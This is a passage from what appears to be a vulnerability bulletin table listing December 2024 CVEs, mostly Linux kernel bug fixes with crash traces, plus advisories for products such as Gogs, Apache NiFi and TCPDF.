el0_svc_common.constprop.0+0xc8/0xf0 do_el0_svc+0x24/0x38 el0_svc+0x38/0x138 el0t_64_sync_handler+0xc0/0xc8 el0t_64_sync+0x188/0x190 The zram->comp_algs[ZRAM_PRIMARY_COMP] can be NULL in zram_add() if comp_algorithm_set() has not been called. User can access the zram device by sysfs after device_add_disk(), so there is a time window to trigger the NULL pointer dereference. Move it ahead device_add_disk() to make sure when user can access the zram device, it is ready. comp_algorithm_set() is protected by zram->init_lock in other places and no such problem. | 2024-12-27 | not yet calculated | CVE-2024-53222 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: clk: ralink: mtmips: fix clocks probe order in oldest ralink SoCs Base clocks are the first in being probed and are real dependencies of the rest of fixed, factor and peripheral clocks. For old ralink SoCs RT2880, RT305x and RT3883 'xtal' must be defined first since in any other case, when fixed clocks are probed they are delayed until 'xtal' is probed so the following warning appears: WARNING: CPU: 0 PID: 0 at drivers/clk/ralink/clk-mtmips.c:499 rt3883_bus_recalc_rate+0x98/0x138 Modules linked in: CPU: 0 PID: 0 Comm: swapper Not tainted 6.6.43 #0 Stack : 805e58d0 00000000 00000004 8004f950 00000000 00000004 00000000 00000000 80669c54 80830000 80700000 805ae570 80670068 00000001 80669bf8 00000000 00000000 00000000 805ae570 80669b38 00000020 804db7dc 00000000 00000000 203a6d6d 80669b78 80669e48 70617773 00000000 805ae570 00000000 00000009 00000000 00000001 00000004 00000001 00000000 00000000 83fe43b0 00000000 ... Call Trace: [<800065d0>] show_stack+0x64/0xf4 [<804bca14>] dump_stack_lvl+0x38/0x60 [<800218ac>] __warn+0x94/0xe4 [<8002195c>] warn_slowpath_fmt+0x60/0x94 [<80259ff8>] rt3883_bus_recalc_rate+0x98/0x138 [<80254530>] __clk_register+0x568/0x688 [<80254838>] of_clk_hw_register+0x18/0x2c [<8070b910>] rt2880_clk_of_clk_init_driver+0x18c/0x594 [<8070b628>] of_clk_init+0x1c0/0x23c [<806fc448>] plat_time_init+0x58/0x18c [<806fdaf0>] time_init+0x10/0x6c [<806f9bc4>] start_kernel+0x458/0x67c ---[ end trace 0000000000000000 ]--- When this driver was mainlined we could not find any active users of old ralink SoCs so we cannot perform any real tests for them. Now, one user of a Belkin f9k1109 version 1 device which uses RT3883 SoC appeared and reported some issues in openWRT: - https://github.com/openwrt/openwrt/issues/16054 Thus, define a 'rt2880_xtal_recalc_rate()' just returning the expected frequency 40Mhz and use it along the old ralink SoCs to have a correct boot trace with no warnings and a working clock plan from the beggining. | 2024-12-27 | not yet calculated | CVE-2024-53223 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx5: Move events notifier registration to be after device registration Move pkey change work initialization and cleanup from device resources stage to notifier stage, since this is the stage which handles this work events. Fix a race between the device deregistration and pkey change work by moving MLX5_IB_STAGE_DEVICE_NOTIFIER to be after MLX5_IB_STAGE_IB_REG in order to ensure that the notifier is deregistered before the device during cleanup. Which ensures there are no works that are being executed after the device has already unregistered which can cause the panic below. BUG: kernel NULL pointer dereference, address: 0000000000000000 PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP PTI CPU: 1 PID: 630071 Comm: kworker/1:2 Kdump: loaded Tainted: G W OE --------- --- 5.14.0-162.6.1.el9_1.x86_64 #1 Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS 090008 02/27/2023 Workqueue: events pkey_change_handler [mlx5_ib] RIP: 0010:setup_qp+0x38/0x1f0 [mlx5_ib] Code: ee 41 54 45 31 e4 55 89 f5 53 48 89 fb 48 83 ec 20 8b 77 08 65 48 8b 04 25 28 00 00 00 48 89 44 24 18 48 8b 07 48 8d 4c 24 16 <4c> 8b 38 49 8b 87 80 0b 00 00 4c 89 ff 48 8b 80 08 05 00 00 8b 40 RSP: 0018:ffffbcc54068be20 EFLAGS: 00010282 RAX: 0000000000000000 RBX: ffff954054494128 RCX: ffffbcc54068be36 RDX: ffff954004934000 RSI: 0000000000000001 RDI: ffff954054494128 RBP: 0000000000000023 R08: ffff954001be2c20 R09: 0000000000000001 R10: ffff954001be2c20 R11: ffff9540260133c0 R12: 0000000000000000 R13: 0000000000000023 R14: 0000000000000000 R15: ffff9540ffcb0905 FS: 0000000000000000(0000) GS:ffff9540ffc80000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 000000010625c001 CR4: 00000000003706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: mlx5_ib_gsi_pkey_change+0x20/0x40 [mlx5_ib] process_one_work+0x1e8/0x3c0 worker_thread+0x50/0x3b0 ? rescuer_thread+0x380/0x380 kthread+0x149/0x170 ? set_kthread_struct+0x50/0x50 ret_from_fork+0x22/0x30 Modules linked in: rdma_ucm(OE) rdma_cm(OE) iw_cm(OE) ib_ipoib(OE) ib_cm(OE) ib_umad(OE) mlx5_ib(OE) mlx5_fwctl(OE) fwctl(OE) ib_uverbs(OE) mlx5_core(OE) mlxdevm(OE) ib_core(OE) mlx_compat(OE) psample mlxfw(OE) tls knem(OE) netconsole nfsv3 nfs_acl nfs lockd grace fscache netfs qrtr rfkill sunrpc intel_rapl_msr intel_rapl_common rapl hv_balloon hv_utils i2c_piix4 pcspkr joydev fuse ext4 mbcache jbd2 sr_mod sd_mod cdrom t10_pi sg ata_generic pci_hyperv pci_hyperv_intf hyperv_drm drm_shmem_helper drm_kms_helper hv_storvsc syscopyarea hv_netvsc sysfillrect sysimgblt hid_hyperv fb_sys_fops scsi_transport_fc hyperv_keyboard drm ata_piix crct10dif_pclmul crc32_pclmul crc32c_intel libata ghash_clmulni_intel hv_vmbus serio_raw [last unloaded: ib_core] CR2: 0000000000000000 ---[ end trace f6f8be4eae12f7bc ]--- | 2024-12-27 | not yet calculated | CVE-2024-53224 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: iommu/tegra241-cmdqv: Fix alignment failure at max_n_shift When configuring a kernel with PAGE_SIZE=4KB, depending on its setting of CONFIG_CMA_ALIGNMENT, VCMDQ_LOG2SIZE_MAX=19 could fail the alignment test and trigger a WARN_ON: WARNING: at drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c:3646 Call trace: arm_smmu_init_one_queue+0x15c/0x210 tegra241_cmdqv_init_structures+0x114/0x338 arm_smmu_device_probe+0xb48/0x1d90 Fix it by capping max_n_shift to CMDQ_MAX_SZ_SHIFT as SMMUv3 CMDQ does. | 2024-12-27 | not yet calculated | CVE-2024-53225 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix NULL pointer derefernce in hns_roce_map_mr_sg() ib_map_mr_sg() allows ULPs to specify NULL as the sg_offset argument. The driver needs to check whether it is a NULL pointer before dereferencing it. | 2024-12-27 | not yet calculated | CVE-2024-53226 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: scsi: bfa: Fix use-after-free in bfad_im_module_exit() BUG: KASAN: slab-use-after-free in __lock_acquire+0x2aca/0x3a20 Read of size 8 at addr ffff8881082d80c8 by task modprobe/25303 Call Trace: <TASK> dump_stack_lvl+0x95/0xe0 print_report+0xcb/0x620 kasan_report+0xbd/0xf0 __lock_acquire+0x2aca/0x3a20 lock_acquire+0x19b/0x520 _raw_spin_lock+0x2b/0x40 attribute_container_unregister+0x30/0x160 fc_release_transport+0x19/0x90 [scsi_transport_fc] bfad_im_module_exit+0x23/0x60 [bfa] bfad_init+0xdb/0xff0 [bfa] do_one_initcall+0xdc/0x550 do_init_module+0x22d/0x6b0 load_module+0x4e96/0x5ff0 init_module_from_file+0xcd/0x130 idempotent_init_module+0x330/0x620 __x64_sys_finit_module+0xb3/0x110 do_syscall_64+0xc1/0x1d0 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> Allocated by task 25303: kasan_save_stack+0x24/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x7f/0x90 fc_attach_transport+0x4f/0x4740 [scsi_transport_fc] bfad_im_module_init+0x17/0x80 [bfa] bfad_init+0x23/0xff0 [bfa] do_one_initcall+0xdc/0x550 do_init_module+0x22d/0x6b0 load_module+0x4e96/0x5ff0 init_module_from_file+0xcd/0x130 idempotent_init_module+0x330/0x620 __x64_sys_finit_module+0xb3/0x110 do_syscall_64+0xc1/0x1d0 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 25303: kasan_save_stack+0x24/0x50 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x60 __kasan_slab_free+0x38/0x50 kfree+0x212/0x480 bfad_im_module_init+0x7e/0x80 [bfa] bfad_init+0x23/0xff0 [bfa] do_one_initcall+0xdc/0x550 do_init_module+0x22d/0x6b0 load_module+0x4e96/0x5ff0 init_module_from_file+0xcd/0x130 idempotent_init_module+0x330/0x620 __x64_sys_finit_module+0xb3/0x110 do_syscall_64+0xc1/0x1d0 entry_SYSCALL_64_after_hwframe+0x77/0x7f Above issue happens as follows: bfad_init error = bfad_im_module_init() fc_release_transport(bfad_im_scsi_transport_template); if (error) goto ext; ext: bfad_im_module_exit(); fc_release_transport(bfad_im_scsi_transport_template); --> Trigger double release Don't call bfad_im_module_exit() if bfad_im_module_init() failed. | 2024-12-27 | not yet calculated | CVE-2024-53227 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: riscv: kvm: Fix out-of-bounds array access In kvm_riscv_vcpu_sbi_init() the entry->ext_idx can contain an out-of-bound index. This is used as a special marker for the base extensions, that cannot be disabled. However, when traversing the extensions, that special marker is not checked prior indexing the array. Add an out-of-bounds check to the function. | 2024-12-27 | not yet calculated | CVE-2024-53228 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix the qp flush warnings in req When the qp is in error state, the status of WQEs in the queue should be set to error. Or else the following will appear. [ 920.617269] WARNING: CPU: 1 PID: 21 at drivers/infiniband/sw/rxe/rxe_comp.c:756 rxe_completer+0x989/0xcc0 [rdma_rxe] [ 920.617744] Modules linked in: rnbd_client(O) rtrs_client(O) rtrs_core(O) rdma_ucm rdma_cm iw_cm ib_cm crc32_generic rdma_rxe ip6_udp_tunnel udp_tunnel ib_uverbs ib_core loop brd null_blk ipv6 [ 920.618516] CPU: 1 PID: 21 Comm: ksoftirqd/1 Tainted: G O 6.1.113-storage+ #65 [ 920.618986] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 [ 920.619396] RIP: 0010:rxe_completer+0x989/0xcc0 [rdma_rxe] [ 920.619658] Code: 0f b6 84 24 3a 02 00 00 41 89 84 24 44 04 00 00 e9 2a f7 ff ff 39 ca bb 03 00 00 00 b8 0e 00 00 00 48 0f 45 d8 e9 15 f7 ff ff <0f> 0b e9 cb f8 ff ff 41 bf f5 ff ff ff e9 08 f8 ff ff 49 8d bc 24 [ 920.620482] RSP: 0018:ffff97b7c00bbc38 EFLAGS: 00010246 [ 920.620817] RAX: 0000000000000000 RBX: 000000000000000c RCX: 0000000000000008 [ 920.621183] RDX: ffff960dc396ebc0 RSI: 0000000000005400 RDI: ffff960dc4e2fbac [ 920.621548] RBP: 0000000000000000 R08: 0000000000000001 R09: ffffffffac406450 [ 920.621884] R10: ffffffffac4060c0 R11: 0000000000000001 R12: ffff960dc4e2f800 [ 920.622254] R13: ffff960dc4e2f928 R14: ffff97b7c029c580 R15: 0000000000000000 [ 920.622609] FS: 0000000000000000(0000) GS:ffff960ef7d00000(0000) knlGS:0000000000000000 [ 920.622979] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 920.623245] CR2: 00007fa056965e90 CR3: 00000001107f1000 CR4: 00000000000006e0 [ 920.623680] Call Trace: [ 920.623815] <TASK> [ 920.623933] ? __warn+0x79/0xc0 [ 920.624116] ? rxe_completer+0x989/0xcc0 [rdma_rxe] [ 920.624356] ? report_bug+0xfb/0x150 [ 920.624594] ? handle_bug+0x3c/0x60 [ 920.624796] ? exc_invalid_op+0x14/0x70 [ 920.624976] ? asm_exc_invalid_op+0x16/0x20 [ 920.625203] ? rxe_completer+0x989/0xcc0 [rdma_rxe] [ 920.625474] ? rxe_completer+0x329/0xcc0 [rdma_rxe] [ 920.625749] rxe_do_task+0x80/0x110 [rdma_rxe] [ 920.626037] rxe_requester+0x625/0xde0 [rdma_rxe] [ 920.626310] ? rxe_cq_post+0xe2/0x180 [rdma_rxe] [ 920.626583] ? do_complete+0x18d/0x220 [rdma_rxe] [ 920.626812] ? rxe_completer+0x1a3/0xcc0 [rdma_rxe] [ 920.627050] rxe_do_task+0x80/0x110 [rdma_rxe] [ 920.627285] tasklet_action_common.constprop.0+0xa4/0x120 [ 920.627522] handle_softirqs+0xc2/0x250 [ 920.627728] ? sort_range+0x20/0x20 [ 920.627942] run_ksoftirqd+0x1f/0x30 [ 920.628158] smpboot_thread_fn+0xc7/0x1b0 [ 920.628334] kthread+0xd6/0x100 [ 920.628504] ? kthread_complete_and_exit+0x20/0x20 [ 920.628709] ret_from_fork+0x1f/0x30 [ 920.628892] </TASK> | 2024-12-27 | not yet calculated | CVE-2024-53229 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: cpufreq: CPPC: Fix possible null-ptr-deref for cppc_get_cpu_cost() cpufreq_cpu_get_raw() may return NULL if the cpu is not in policy->cpus cpu mask and it will cause null pointer dereference, so check NULL for cppc_get_cpu_cost(). | 2024-12-27 | not yet calculated | CVE-2024-53230 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: cpufreq: CPPC: Fix possible null-ptr-deref for cpufreq_cpu_get_raw() cpufreq_cpu_get_raw() may return NULL if the cpu is not in policy->cpus cpu mask and it will cause null pointer dereference. | 2024-12-27 | not yet calculated | CVE-2024-53231 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: iommu/s390: Implement blocking domain This fixes a crash when surprise hot-unplugging a PCI device. This crash happens because during hot-unplug __iommu_group_set_domain_nofail() attaching the default domain fails when the platform no longer recognizes the device as it has already been removed and we end up with a NULL domain pointer and UAF. This is exactly the case referred to in the second comment in __iommu_device_set_domain() and just as stated there if we can instead attach the blocking domain the UAF is prevented as this can handle the already removed device. Implement the blocking domain to use this handling. With this change, the crash is fixed but we still hit a warning attempting to change DMA ownership on a blocked device. | 2024-12-27 | not yet calculated | CVE-2024-53232 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: unicode: Fix utf8_load() error path utf8_load() requests the symbol "utf8_data_table" and then checks if the requested UTF-8 version is supported. If it's unsupported, it tries to put the data table using symbol_put(). If an unsupported version is requested, symbol_put() fails like this: kernel BUG at kernel/module/main.c:786! RIP: 0010:__symbol_put+0x93/0xb0 Call Trace: <TASK> ? __die_body.cold+0x19/0x27 ? die+0x2e/0x50 ? do_trap+0xca/0x110 ? do_error_trap+0x65/0x80 ? __symbol_put+0x93/0xb0 ? exc_invalid_op+0x51/0x70 ? __symbol_put+0x93/0xb0 ? asm_exc_invalid_op+0x1a/0x20 ? __pfx_cmp_name+0x10/0x10 ? __symbol_put+0x93/0xb0 ? __symbol_put+0x62/0xb0 utf8_load+0xf8/0x150 That happens because symbol_put() expects the unique string that identify the symbol, instead of a pointer to the loaded symbol. Fix that by using such string. | 2024-12-27 | not yet calculated | CVE-2024-53233 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: erofs: handle NONHEAD !delta[1] lclusters gracefully syzbot reported a WARNING in iomap_iter_done: iomap_fiemap+0x73b/0x9b0 fs/iomap/fiemap.c:80 ioctl_fiemap fs/ioctl.c:220 [inline] Generally, NONHEAD lclusters won't have delta[1]==0, except for crafted images and filesystems created by pre-1.0 mkfs versions. Previously, it would immediately bail out if delta[1]==0, which led to inadequate decompressed lengths (thus FIEMAP is impacted). Treat it as delta[1]=1 to work around these legacy mkfs versions. `lclusterbits > 14` is illegal for compact indexes, error out too. | 2024-12-27 | not yet calculated | CVE-2024-53234 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: erofs: fix file-backed mounts over FUSE syzbot reported a null-ptr-deref in fuse_read_args_fill: fuse_read_folio+0xb0/0x100 fs/fuse/file.c:905 filemap_read_folio+0xc6/0x2a0 mm/filemap.c:2367 do_read_cache_folio+0x263/0x5c0 mm/filemap.c:3825 read_mapping_folio include/linux/pagemap.h:1011 [inline] erofs_bread+0x34d/0x7e0 fs/erofs/data.c:41 erofs_read_superblock fs/erofs/super.c:281 [inline] erofs_fc_fill_super+0x2b9/0x2500 fs/erofs/super.c:625 Unlike most filesystems, some network filesystems and FUSE need unavoidable valid `file` pointers for their read I/Os [1]. Anyway, those use cases need to be supported too. [1] https://docs.kernel.org/filesystems/vfs.html | 2024-12-27 | not yet calculated | CVE-2024-53235 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: xsk: Free skb when TX metadata options are invalid When a new skb is allocated for transmitting an xsk descriptor, i.e., for every non-multibuf descriptor or the first frag of a multibuf descriptor, but the descriptor is later found to have invalid options set for the TX metadata, the new skb is never freed. This can leak skbs until the send buffer is full which makes sending more packets impossible. Fix this by freeing the skb in the error path if we are currently dealing with the first frag, i.e., an skb allocated in this iteration of xsk_build_skb. | 2024-12-27 | not yet calculated | CVE-2024-53236 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: fix use-after-free in device_for_each_child() Syzbot has reported the following KASAN splat: BUG: KASAN: slab-use-after-free in device_for_each_child+0x18f/0x1a0 Read of size 8 at addr ffff88801f605308 by task kbnepd bnep0/4980 CPU: 0 UID: 0 PID: 4980 Comm: kbnepd bnep0 Not tainted 6.12.0-rc4-00161-gae90f6a6170d #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x100/0x190 ? device_for_each_child+0x18f/0x1a0 print_report+0x13a/0x4cb ? __virt_addr_valid+0x5e/0x590 ? __phys_addr+0xc6/0x150 ? device_for_each_child+0x18f/0x1a0 kasan_report+0xda/0x110 ? device_for_each_child+0x18f/0x1a0 ? __pfx_dev_memalloc_noio+0x10/0x10 device_for_each_child+0x18f/0x1a0 ? __pfx_device_for_each_child+0x10/0x10 pm_runtime_set_memalloc_noio+0xf2/0x180 netdev_unregister_kobject+0x1ed/0x270 unregister_netdevice_many_notify+0x123c/0x1d80 ? __mutex_trylock_common+0xde/0x250 ? __pfx_unregister_netdevice_many_notify+0x10/0x10 ? trace_contention_end+0xe6/0x140 ? __mutex_lock+0x4e7/0x8f0 ? __pfx_lock_acquire.part.0+0x10/0x10 ? rcu_is_watching+0x12/0xc0 ? unregister_netdev+0x12/0x30 unregister_netdevice_queue+0x30d/0x3f0 ? __pfx_unregister_netdevice_queue+0x10/0x10 ? __pfx_down_write+0x10/0x10 unregister_netdev+0x1c/0x30 bnep_session+0x1fb3/0x2ab0 ? __pfx_bnep_session+0x10/0x10 ? __pfx_lock_release+0x10/0x10 ? __pfx_woken_wake_function+0x10/0x10 ? __kthread_parkme+0x132/0x200 ? __pfx_bnep_session+0x10/0x10 ? kthread+0x13a/0x370 ? __pfx_bnep_session+0x10/0x10 kthread+0x2b7/0x370 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x48/0x80 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 4974: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0xaa/0xb0 __kmalloc_noprof+0x1d1/0x440 hci_alloc_dev_priv+0x1d/0x2820 __vhci_create_device+0xef/0x7d0 vhci_write+0x2c7/0x480 vfs_write+0x6a0/0xfc0 ksys_write+0x12f/0x260 do_syscall_64+0xc7/0x250 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 4979: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x60 __kasan_slab_free+0x4f/0x70 kfree+0x141/0x490 hci_release_dev+0x4d9/0x600 bt_host_release+0x6a/0xb0 device_release+0xa4/0x240 kobject_put+0x1ec/0x5a0 put_device+0x1f/0x30 vhci_release+0x81/0xf0 __fput+0x3f6/0xb30 task_work_run+0x151/0x250 do_exit+0xa79/0x2c30 do_group_exit+0xd5/0x2a0 get_signal+0x1fcd/0x2210 arch_do_signal_or_restart+0x93/0x780 syscall_exit_to_user_mode+0x140/0x290 do_syscall_64+0xd4/0x250 entry_SYSCALL_64_after_hwframe+0x77/0x7f In 'hci_conn_del_sysfs()', 'device_unregister()' may be called when an underlying (kobject) reference counter is greater than 1. This means that reparenting (happened when the device is actually freed) is delayed and, during that delay, parent controller device (hciX) may be deleted. Since the latter may create a dangling pointer to freed parent, avoid that scenario by reparenting to NULL explicitly. | 2024-12-27 | not yet calculated | CVE-2024-53237 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btmtk: adjust the position to init iso data anchor MediaTek iso data anchor init should be moved to where MediaTek claims iso data interface. If there is an unexpected BT usb disconnect during setup flow, it will cause a NULL pointer crash issue when releasing iso anchor since the anchor wasn't been init yet. Adjust the position to do iso data anchor init. [ 17.137991] pc : usb_kill_anchored_urbs+0x60/0x168 [ 17.137998] lr : usb_kill_anchored_urbs+0x44/0x168 [ 17.137999] sp : ffffffc0890cb5f0 [ 17.138000] x29: ffffffc0890cb5f0 x28: ffffff80bb6c2e80 [ 17.144081] gpio gpiochip0: registered chardev handle for 1 lines [ 17.148421] x27: 0000000000000000 [ 17.148422] x26: ffffffd301ff4298 x25: 0000000000000003 x24: 00000000000000f0 [ 17.148424] x23: 0000000000000000 x22: 00000000ffffffff x21: 0000000000000001 [ 17.148425] x20: ffffffffffffffd8 x19: ffffff80c0f25560 x18: 0000000000000000 [ 17.148427] x17: ffffffd33864e408 x16: ffffffd33808f7c8 x15: 0000000000200000 [ 17.232789] x14: e0cd73cf80ffffff x13: 50f2137c0a0338c9 x12: 0000000000000001 [ 17.239912] x11: 0000000080150011 x10: 0000000000000002 x9 : 0000000000000001 [ 17.247035] x8 : 0000000000000000 x7 : 0000000000008080 x6 : 8080000000000000 [ 17.254158] x5 : ffffffd33808ebc0 x4 : fffffffe033dcf20 x3 : 0000000080150011 [ 17.261281] x2 : ffffff8087a91400 x1 : 0000000000000000 x0 : ffffff80c0f25588 [ 17.268404] Call trace: [ 17.270841] usb_kill_anchored_urbs+0x60/0x168 [ 17.275274] btusb_mtk_release_iso_intf+0x2c/0xd8 [btusb (HASH:5afe 6)] [ 17.284226] btusb_mtk_disconnect+0x14/0x28 [btusb (HASH:5afe 6)] [ 17.292652] btusb_disconnect+0x70/0x140 [btusb (HASH:5afe 6)] [ 17.300818] usb_unbind_interface+0xc4/0x240 [ 17.305079] device_release_driver_internal+0x18c/0x258 [ 17.310296] device_release_driver+0x1c/0x30 [ 17.314557] bus_remove_device+0x140/0x160 [ 17.318643] device_del+0x1c0/0x330 [ 17.322121] usb_disable_device+0x80/0x180 [ 17.326207] usb_disconnect+0xec/0x300 [ 17.329948] hub_quiesce+0x80/0xd0 [ 17.333339] hub_disconnect+0x44/0x190 [ 17.337078] usb_unbind_interface+0xc4/0x240 [ 17.341337] device_release_driver_internal+0x18c/0x258 [ 17.346551] device_release_driver+0x1c/0x30 [ 17.350810] usb_driver_release_interface+0x70/0x88 [ 17.355677] proc_ioctl+0x13c/0x228 [ 17.359157] proc_ioctl_default+0x50/0x80 [ 17.363155] usbdev_ioctl+0x830/0xd08 [ 17.366808] __arm64_sys_ioctl+0x94/0xd0 [ 17.370723] invoke_syscall+0x6c/0xf8 [ 17.374377] el0_svc_common+0x84/0xe0 [ 17.378030] do_el0_svc+0x20/0x30 [ 17.381334] el0_svc+0x34/0x60 [ 17.384382] el0t_64_sync_handler+0x88/0xf0 [ 17.388554] el0t_64_sync+0x180/0x188 [ 17.392208] Code: f9400677 f100a2f4 54fffea0 d503201f (b8350288) [ 17.398289] ---[ end trace 0000000000000000 ]--- | 2024-12-27 | not yet calculated | CVE-2024-53238 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ALSA: 6fire: Release resources at card release The current 6fire code tries to release the resources right after the call of usb6fire_chip_abort(). But at this moment, the card object might be still in use (as we're calling snd_card_free_when_closed()). For avoid potential UAFs, move the release of resources to the card's private_free instead of the manual call of usb6fire_chip_destroy() at the USB disconnect callback. | 2024-12-27 | not yet calculated | CVE-2024-53239 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: xen/netfront: fix crash when removing device When removing a netfront device directly after a suspend/resume cycle it might happen that the queues have not been setup again, causing a crash during the attempt to stop the queues another time. Fix that by checking the queues are existing before trying to stop them. This is XSA-465 / CVE-2024-53240. | 2024-12-24 | not yet calculated | CVE-2024-53240 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: x86/xen: don't do PV iret hypercall through hypercall page Instead of jumping to the Xen hypercall page for doing the iret hypercall, directly code the required sequence in xen-asm.S. This is done in preparation of no longer using hypercall page at all, as it has shown to cause problems with speculation mitigations. This is part of XSA-466 / CVE-2024-53241. | 2024-12-24 | not yet calculated | CVE-2024-53241 |
| n/a -- n/a |
An issue was discovered in Kurmi Provisioning Suite before 7.9.0.35, 7.10.x through 7.10.0.18, and 7.11.x through 7.11.0.15. A path traversal vulnerability in the DocServlet servlet allows remote attackers to retrieve any file from the Kurmi web application installation folder, e.g., files such as the obfuscated and/or compiled Kurmi source code. | 2024-12-27 | not yet calculated | CVE-2024-54453 |
| n/a -- n/a |
An issue was discovered in Kurmi Provisioning Suite before 7.9.0.35, 7.10.x through 7.10.0.18, and 7.11.x through 7.11.0.15. An Observable Response Discrepancy vulnerability in the sendPasswordReinitLink action of the unlogged.do page allows remote attackers to test whether a username is valid or not. This allows confirmation of valid usernames. | 2024-12-27 | not yet calculated | CVE-2024-54454 |
| n/a -- n/a |
Weak algorithm used to sign RPM package. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux) before build 39185. | 2024-12-23 | not yet calculated | CVE-2024-55539 |
| n/a -- n/a |
Gogs is an open source self-hosted Git service. A malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server. The vulnerability is fixed in 0.13.1. | 2024-12-23 | not yet calculated | CVE-2024-55947 |
| n/a -- n/a |
Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.216, Tabby terminal emulator contains overly permissive entitlements that are unnecessary for its core functionality and plugin system, creating potential security vulnerabilities. The application currently holds powerful permissions including camera, microphone access, and the ability to access personal folders (Downloads, Documents, etc.) through Apple Events, while also maintaining dangerous entitlements that enable code injection. The concerning entitlements are com.apple.security.cs.allow-dyld-environment-variables and com.apple.security.cs.disable-library-validation. Since Tabby's plugins and themes are NodeJS-based without native libraries or frameworks, and no environment variables are used in the codebase, it is recommended to review and remove at least one of the entitlements (com.apple.security.cs.disable-library-validation or com.apple.security.cs.allow-dyld-environment-variables) to prevent DYLD_INSERT_LIBRARIES injection while maintaining full application functionality. This vulnerability is fixed in 1.0.216. | 2024-12-26 | not yet calculated | CVE-2024-55950 |
| n/a -- n/a |
LGSL (Live Game Server List) provides online status for games. Before 7.0.0, a stored cross-site scripting (XSS) vulnerability was identified in lgsl. The function lgsl_query_40 in lgsl_protocol.php has implemented an HTTP crawler. This function makes a request to the registered game server, and upon crawling the malicious /info endpoint with our payload, will render our javascript on the info page. This information is being displayed via lgsl_details.php. This vulnerability is fixed in 7.0.0. | 2024-12-26 | not yet calculated | CVE-2024-56361 |
| n/a -- n/a |
oc_huff_tree_unpack in huffdec.c in libtheora in Theora through 1.0 7180717 has an invalid negative left shift. | 2024-12-25 | not yet calculated | CVE-2024-56431 |
| n/a -- n/a |
Apache NiFi 1.10.0 through 2.0.0 are missing fine-grained authorization checking for Parameter Contexts, referenced Controller Services, and referenced Parameter Providers, when creating new Process Groups. Creating a new Process Group can include binding to a Parameter Context, but in cases where the Process Group did not reference any Parameter values, the framework did not check user authorization for the bound Parameter Context. Missing authorization for a bound Parameter Context enabled clients to download non-sensitive Parameter values after creating the Process Group. Creating a new Process Group can also include referencing existing Controller Services or Parameter Providers. The framework did not check user authorization for referenced Controller Services or Parameter Providers, enabling clients to create Process Groups and use these components that were otherwise unauthorized. This vulnerability is limited in scope to authenticated users authorized to create Process Groups. The scope is further limited to deployments with component-based authorization policies. Upgrading to Apache NiFi 2.1.0 is the recommended mitigation, which includes authorization checking for Parameter and Controller Service references on Process Group creation. | 2024-12-28 | not yet calculated | CVE-2024-56512 |
| n/a -- n/a |
An issue was discovered in TCPDF before 6.8.0. setSVGStyles does not sanitize the SVG font-family attribute. | 2024-12-27 | not yet calculated | CVE-2024-56519 |
| n/a -- n/a |
An issue was discovered in tc-lib-pdf-font before 2.6.4, as used in TCPDF before 6.8.0 and other products. Fonts are mishandled, e.g., FontBBox for Type 1 and TrueType fonts is misparsed. | 2024-12-27 | not yet calculated | CVE-2024-56520 |
| n/a -- n/a |
An issue was discovered in TCPDF before 6.8.0. If libcurl is used, CURLOPT_SSL_VERIFYHOST and CURLOPT_SSL_VERIFYPEER are set unsafely. | 2024-12-27 | not yet calculated | CVE-2024-56521 |
| n/a -- n/a |
An issue was discovered in TCPDF before 6.8.0. unserializeTCPDFtag uses != (aka loose comparison) and does not use a constant-time function to compare TCPDF tag hashes. | 2024-12-27 | not yet calculated | CVE-2024-56522 |
| n/a -- n/a |
